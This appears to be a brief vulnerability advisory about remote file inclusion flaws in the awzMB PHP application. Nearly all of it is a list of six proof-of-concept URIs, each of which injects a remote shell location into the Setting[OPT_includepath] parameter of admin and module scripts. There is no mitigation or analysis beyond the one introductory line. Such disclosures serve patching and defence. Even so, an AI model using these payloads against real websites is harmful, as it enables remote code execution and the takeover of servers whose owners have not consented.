|
awzMB Multiple Remote File Include Vulnerabilities
An attacker can exploit these issues via a browser. The following proof-of-concept URIs are available: http://www.example.com/[PATH]/awzmb/adminhelp.php?Setting[OPT_includepath]=[-Sh3ll-] http://www.example.com/[PATH]/awzmb/modules/admin.incl.php?Setting[OPT_includepath]=[-Sh3ll-] http://www.example.com/[PATH]/awzmb/modules/reg.incl.php?Setting[OPT_includepath]=[-Sh3ll-] http://www.example.com/[PATH]/awzmb/modules/help.incl.php?Setting[OPT_includepath]=[-Sh3ll-] http://www.example.com/[PATH]/awzmb/modules/gbook.incl.php?Setting[OPT_includepath]=[-Sh3ll-] http://www.example.com/[PATH]/awzmb/modules/core/core.incl.php?Setting[OPT_includepath]=[-Sh3ll-] |
|
Privacy Statement |